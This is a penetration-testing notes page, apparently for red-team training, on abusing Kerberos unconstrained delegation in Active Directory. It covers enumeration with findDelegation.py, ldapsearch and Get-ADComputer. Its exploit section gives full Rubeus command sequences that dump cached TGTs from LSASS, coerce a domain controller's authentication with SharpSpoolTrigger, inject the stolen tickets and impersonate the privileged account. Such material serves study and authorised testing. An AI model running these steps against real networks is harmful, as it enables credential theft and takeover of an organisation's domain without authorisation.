# Unconstrained Delegation
Unconstrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for **ANY** service on behalf of a user.
The *Trust this computer for delegation to any service (Kerberos only)* privilege must be enabled in the *Delegation* tab within the object/computer's properties.
> Attribute: userAccountControl -> TRUSTED\_FOR\_DELEGATION
Unconstrained Delegation properties [Image From CRTO]
When unconstrained delegation is enabled on a computer, the Key Distribution Center will include a copy of the user's Ticket Granting Ticket inside the Service Ticket. When a user authenticates to the target service using the Service Ticket, their Ticket Granting Ticket will be cached in memory on the computer hosting the service for future delegation use.
{% hint style="info" %}
The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.
{% endhint %}
## Enumeration
{% tabs %}
{% tab title="impacket-findDelegation" %}
{% embed url="" %}
{% code title="Linux (Attacker)" %}
```fish
findDelegation.py [domain]/[username]:[password]
```
{% endcode %}
{% endtab %}
{% tab title="ldapsearch" %}
{% embed url="" %}
{% code title="Linux (Attacker)" %}
```fish
ldapsearch -x -H ldap://[DC FQDN] \
-D 'user@domain' -w 'Password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' \
dNSHostName sAMAccountName
```
{% endcode %}
{% endtab %}
{% tab title="Get-ADComputer" %}
{% embed url="" %}
{% code title="Windows (PowerShell)" %}
```powershell
Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
```
{% endcode %}
{% endtab %}
{% endtabs %}
## Exploit
{% tabs %}
{% tab title="Rubeus (Use Cached TGT)" %}
{% embed url="" %}
{% embed url="" %}
#### Scenario
SQL$ has unconstrained delegation rights, and you have access to a host where the TGT of SQL$ is stored in memory.
The goal is to extract the TGT of a privileged user whose TGT was cached due to recent authentication to SQL$. We can then use the TGT of the privileged user to access any other service.
{% code title="Windows (Target)" %}
```powershell
## Show Cached Tickets
Rubeus.exe triage
## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap
## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]
## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```
{% endcode %}
{% hint style="info" %}
You must have elevated privileges on the target computer in order to dump TGTs from LSASS.
{% endhint %}
{% endtab %}
{% tab title="Rubeus (Coerce A TGT)" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% code title="Windows (Target)" %}
```powershell
## Monitor And Extract New TGTs As They Get Cached In The Local Computer
Rubeus.exe monitor /interval:10 /nowrap /runfor:60
## Force Authentication From Target (dc) To Listener (service)
SharpSpoolTrigger.exe dc.weelee.zip service.weelee.zip
## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]
## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```
{% endcode %}
{% hint style="info" %}
You must have elevated privileges on the listener (in this case *service.weelee.zip)* in order to monitor for new cached Kerberos Tickets on it.
{% endhint %}
{% endtab %}
{% endtabs %}
